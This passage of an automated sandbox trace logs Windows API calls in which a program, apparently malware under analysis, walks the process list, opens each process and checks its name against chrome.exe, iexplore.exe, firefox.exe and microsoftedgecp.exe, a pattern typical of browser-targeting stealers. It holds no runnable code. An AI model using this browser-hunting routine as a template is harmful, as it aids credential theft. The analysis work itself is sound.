	[0222.162] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.162] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.162] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0222.163] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x52ec
	[0222.163] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.163] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0222.163] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.164] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.164] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.164] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0222.164] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.164] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.164] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0222.165] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x52f0
	[0222.165] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.165] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0222.165] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.166] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.166] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.166] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0222.166] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.166] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.166] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0222.167] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x52f4
	[0222.167] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.167] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0222.168] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.168] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.168] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.168] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0222.168] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.168] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.168] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x29, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0222.169] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x52f8
	[0222.169] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.169] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0222.170] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.170] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.170] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.170] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0222.170] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.170] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.170] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0222.171] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x52fc
	[0222.171] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.171] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0222.172] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.172] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.172] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.172] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0222.172] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.172] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.172] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0222.173] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x5300
	[0222.173] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.173] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0222.174] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.174] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.174] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.174] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0222.174] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.174] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.174] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0222.175] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x5304
	[0222.175] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.175] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0222.176] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.176] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.177] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.177] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0222.177] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.177] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.177] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0222.178] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x5308
	[0222.178] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.178] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0222.178] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.178] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.179] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.179] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0222.179] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.179] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.179] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0222.180] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x530c
	[0222.180] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.180] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0222.180] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.180] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.181] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.181] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0222.181] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.181] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.181] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0222.182] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x5310
	[0222.182] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.182] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0222.182] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.182] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.183] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.183] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0222.183] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.183] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.183] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0222.184] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x5314
	[0222.184] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.184] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0222.184] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.184] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.185] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.185] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0222.185] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.185] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.185] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0222.186] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x5318
	[0222.186] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.186] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0222.186] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.186] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.187] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.187] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0222.187] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.187] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.187] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0222.188] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x531c
	[0222.188] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.188] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0222.188] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.188] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.189] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.189] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0222.189] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.189] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.189] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0222.190] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x5320
	[0222.190] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.190] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0222.190] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.190] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.190] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.190] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0222.191] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.191] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.191] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0222.192] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x5324
	[0222.192] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.192] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0222.192] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.192] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.192] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.192] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0222.193] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.193] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.193] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0222.194] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0222.194] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0222.194] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x5328
	[0222.195] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.195] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0222.195] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.195] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.196] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.196] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0222.197] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.197] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.197] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0222.198] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x532c
	[0222.198] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.198] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0222.198] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.198] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.198] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.198] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0222.199] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.199] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.199] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0222.200] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x5330
	[0222.200] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.200] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0222.200] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.200] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.200] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.200] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0222.201] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.201] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.201] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0222.202] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x5334
	[0222.202] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.202] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0222.202] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.202] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.202] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.203] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0222.203] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.203] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.203] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0222.204] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x5338
	[0222.204] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.204] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0222.204] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.204] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.205] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.205] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0222.205] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.206] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.206] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0222.207] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x533c
	[0222.207] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.207] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0222.208] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.208] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.208] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.208] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0222.208] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.208] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.208] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0222.209] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x5340
	[0222.209] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.209] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0222.210] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.210] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.210] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.210] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0222.211] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.211] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.211] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0222.212] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x5344
	[0222.212] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.212] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0222.212] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.212] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.213] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.213] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0222.213] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.213] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.214] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0222.214] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x5348
	[0222.214] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.214] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0222.215] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.215] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.215] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.215] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0222.215] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.215] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
